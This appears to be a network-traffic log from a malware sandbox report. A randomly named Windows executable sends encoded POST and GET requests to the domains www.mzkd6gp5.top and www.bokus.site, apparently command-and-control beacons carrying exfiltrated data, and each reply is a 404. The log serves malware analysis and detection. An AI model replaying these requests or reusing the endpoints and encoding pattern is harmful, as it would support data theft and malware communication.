                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 2f 2f 42 54 78 4b 4f 37 43 76 49 33 6c 75 69 4f 64 30 6a 6f 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Q//BTxKO7CvI3luiOd0jo=
                                                                                    Jan 9, 2025 16:54:24.243889093 CET | 915 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKZcO2J89AEJJw0Ufm75pQOh%2BrjIY4c86hyZGAVXvORG0uVRyqqwLdHkh0G6M5%2FsvuABLqkTeUdcUt7JZmDbw3kV%2Fg0c9bOJX%2FzP5GsoSMhJTSpJcJ0slBMPw7Vv2Y8aSpOo"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b0a8c0810ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118830&min_rtt=118830&rtt_var=59415&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:24.243936062 CET | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.11.30 | 49829 | 104.21.32.18 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:26.358896017 CET | 3936 bytes | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2b 65 30 6b 38 33 36 31 47 6f 63 72 52 42 36 2f 36 32 78 6f 4c 31 56 48 4a 34 51 4d 6a 6e 41 2b 79 69 4b 4c 70 36 4f 37 33 68 69 33 52 4f 32 48 75 4c 51 4e 74 66 63 47 55 4b 6b 4d 2f 69 66 64 63 65 2f 53 68 6f 76 77 38 42 4c 58 32 6b 76 55 6c 56 33 72 55 53 34 31 53 6b 2b 39 72 50 63 71 62 43 37 62 6c 59 39 2f 32 56 32 6a 4b 71 43 64 2b 6e 71 69 61 69 79 78 58 69 36 35 71 72 38 4f 4a 71 45 4e 6d 55 35 53 63 45 51 69 75 4b 75 45 41 66 79 30 56 52 4c 4e 59 4e 49 4f 44 38 4f 63 6e 78 66 6d 7a 67 4c 65 6b 5a 2f 62 4e 61 33 57 33 68 6a 72 64 32 6a 76 49 38 32 4f 35 6c 77 2f 32 78 67 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:26.937643051 CET | 914 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:26 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZpPX3MVTEyrLZ1ZBb3%2Fite7QEnXTmOTiEgq842kYJGH%2BnHGJKJZzOoCQAj%2Ff9K2kZzKxBWDaVROEEKGf3d%2Fih4NQoy667gjFDKH9tB9lxWFLAbQrp9uFQNibggyg7cziV58D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b1b2932233a-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119567&min_rtt=119567&rtt_var=59783&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:26.937685966 CET | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    8 | 192.168.11.30 | 49830 | 104.21.32.18 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:29.008332968 CET | 535 bytes | OUT | GET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:29.548048019 CET | 924 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd8Ww%2FW%2BucYITL%2FryslLANlYgQjyfyCJmgA3YPhjuABM2oocNs8qU8cAnL0556n1TqBMKg6YIr0qdyw2ssVD0IgEHRsPK3lw9baQB8C37FpoQFgrSLziU4UdxGhJdImkybSy"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59b2bbabe10ed-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118732&min_rtt=118732&rtt_var=59366&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                    Jan 9, 2025 16:54:29.548089981 CET | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    9 | 192.168.11.30 | 49831 | 199.192.21.169 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:34.927990913 CET | 793 bytes | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 55 41 74 66 4d 6c 46 63 2b 69 2b 69 59 4c 76 64 49 63 42 76 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bUAtfMlFc+i+iYLvdIcBvA==
                                                                                    Jan 9, 2025 16:54:35.120670080 CET | 918 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    10 | 192.168.11.30 | 49832 | 199.192.21.169 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:37.648225069 CET | 813 bytes | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 43 62 77 4d 2b 74 52 6e 6a 61 2b 4d 6d 2f 5a 35 7a 51 7a 49 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEECbwM+tRnja+Mm/Z5zQzI=
                                                                                    Jan 9, 2025 16:54:37.839062929 CET | 918 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:37 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    11 | 192.168.11.30 | 49833 | 199.192.21.169 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:40.359262943 CET | 2578 bytes | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 57 62 56 64 70 65 44 48 72 37 31 67 6e 72 47 6e 71 75 4c 34 41 33 5a 31 6e 74 59 62 76 4f 56 32 2b 56 74 66 33 38 38 57 2f 67 5a 64 2f 44 63 32 6f 47 35 66 4c 70 77 7a 32 59 62 62 77 67 37 39 44 2f 4f 44 2f 73 49 37 37 5a 37 55 32 42 4f 37 54 34 48 5a 74 41 75 43 38 61 74 54 50 68 6a 38 4b 38 47 56 4d 6d 55 74 72 42 44 7a 36 78 43 4f 52 4e 79 59 78 42 51 48 62 6f 47 69 79 2b 33 62 4a 48 79 50 45 55 50 45 72 4e 4a 57 46 59 35 33 5a 6f 51 4d 68 4d 63 54 77 6f 59 68 6f 76 69 54 49 35 38 32 61 55 34 43 51 36 37 53 53 31 76 64 73 58 53 74 52 76 2b 76 68 38 55 62 6c 71 6e 6f 76 32 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:40.359307051 CET | 1352 bytes | OUT | Data Raw: 47 53 65 75 37 63 75 42 76 70 74 36 59 33 30 47 62 42 57 44 35 65 70 7a 63 4a 61 4f 53 71 78 35 62 71 71 46 6a 4a 4f 31 52 5a 33 61 2f 4a 2f 2f 78 68 78 39 41 58 6f 68 41 50 73 42 2f 6e 68 37 6c 51 6b 76 6e 55 72 43 30 59 6a 44 38 74 35 75 76 4a
                                                                                    Data Ascii: GSeu7cuBvpt6Y30GbBWD5epzcJaOSqx5bqqFjJO1RZ3a/J//xhx9AXohAPsB/nh7lQkvnUrC0YjD8t5uvJH+btWLlkM5T++pBUQ57tsNVA25ZzYgNS9RHwBLeXsMQCl1VLVt7rV7Ule2JzZukKpuKoTaiQijN4V6v5WrCsKUfUXnwhlGUX+vMWIlAoMw/PWjcHnvseFjA8OX1jj+yoW515+tok/RZwFLSS3I98ReNPwgY/iFRDm
                                                                                    Jan 9, 2025 16:54:40.553983927 CET | 918 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:40 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    12 | 192.168.11.30 | 49835 | 199.192.21.169 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:43.057981968 CET | 533 bytes | OUT | GET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:43.248054981 CET | 933 bytes | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:43 GMT
